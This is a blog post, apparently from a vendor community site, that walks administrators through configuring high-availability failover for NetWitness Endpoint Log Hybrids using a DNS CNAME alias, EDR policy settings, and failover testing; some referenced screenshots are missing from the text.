To start, you'll need to have an ELH already installed and orchestrated within your environment.  We'll assume this is your Primary ELH, where your endpoint agents will ordinarily be checking into, and what you need to have an alternate for in the event of a failure (hardware breaks, datacenter loses power, region-wide catastrophic event...whatever).


To install your Alternate ELH (where your endpoint agents should failover to) you'll need to follow the instructions here:  under "Task 3 - Configuring Multiple Endpoint Log Hybrid".

**Make sure that you follow these instructions exactly...I did not the first time I set this up in my lab, and so of course my Alternate ELH did not function properly in my NetWitness environment...**


Once you have your Alternate ELH fully installed and orchestrated, your next step will be to create a DNS CNAME record.  This alias will be the key to entire HA implementation.  You'll want to point the record to your Primary ELH; e.g.: 


**Be aware that Windows DNS defaults to a 60 minute TTL...this will directly impact how quickly your endpoint agents will point to the Target Host FQDN in the CNAME record, so if 60 minutes is too long to wait for endpoints to be available during a failover you might want to consider setting the TTL lower...** (props to John Snider for helping me identify this in my lab during my testing)


And your last step in the initial setup will be to create Endpoint Policies that use this alias value.  In the NetWitness UI, navigate to Admin/Endpoint Sources/Policies and either modify an existing EDR policy (the Default, for instance) or create a new EDR policy.  The relevant configuration option in the EDR policy setting is the "Endpoint Server" option within the "Endpoint Server Settings" section:


When editing this option in the Policy, you'll want to choose your Primary ELH in the "Endpoint Server" dropdown and (the most important part) enter the CNAME record's alias as the "Server Alias":


Add and/or modify any additional policy settings as required for your organization and NetWitness environment, and when complete be sure to Publish your changes. (Guide to configuring Endpoint Groups and Policies here: NetWitness Endpoint Configuration Guide for RSA NetWitness Platform 11.x - Table of Contents)


You can test your setup and environment by running some nslookup commands from endpoints within your environment to check that your DNS CNAME is working properly and endpoints are resolving the alias to the correct target (Primary ELH at this point), as well as creating an Endpoint EDR Policy to point some active endpoint agents to the Alternate ELH (**this check is rather important, as it will help you confirm that your Alternate ELH is installed, orchestrated, and configured correctly**).


Prior to moving on to the next step, ensure that all your agents have received the "Updated" Policy - if any show in the UI with a "Pending" status after you've made these changes, then that means they have not yet updated:


Assuming all your tests come back positive and all your agents' policies are showing "Updated", you can now simulate a failure to validate that your setup is, indeed, HA-capable. This can be quite simple, and the failover process similarly straightforward.


  1. Shutdown the Primary ELH
  2. Modify the DNS CNAME record to point to the Secondary ELH
    1. This is where the TTL value will become important...the longer the TTL the longer it may take your endpoints to change over to the Alternate ELH
    2. Also...there is no need to change the existing Endpoint Policy, as the Server Alias you already entered will ensure your endpoints
  3. Confirm that you see endpoints talking to the Alternate ELH
    1. Run tcpdump on the Alternate ELH to check for incoming UDP and TCP packets from endpoints
    2. See hosts showing up in the UI
    3. Investigate hosts


After Steps 1 and 2 are complete, you can confirm that agents are communicating with the Alternate ELH by running tcpdump on that Alternate ELH to look for the UDP check-ins as well as the TCP tracking/scan data uploads: well as confirm in the UI that you can see and investigate hosts:



Once your validation and testing is complete, you can simply revert the procedure by powering on the Primary ELH, powering off the Alternate ELH, and modifying the CNAME record to point back to the Primary ELH.


Of course, during an actual failure event, your only action to ensure HA of NetWitness Endpoint would be to change the CNAME record, so be sure to have a procedure in place for an emergency change control, if necessary in your organization.

Filter Blog

By date: By tag: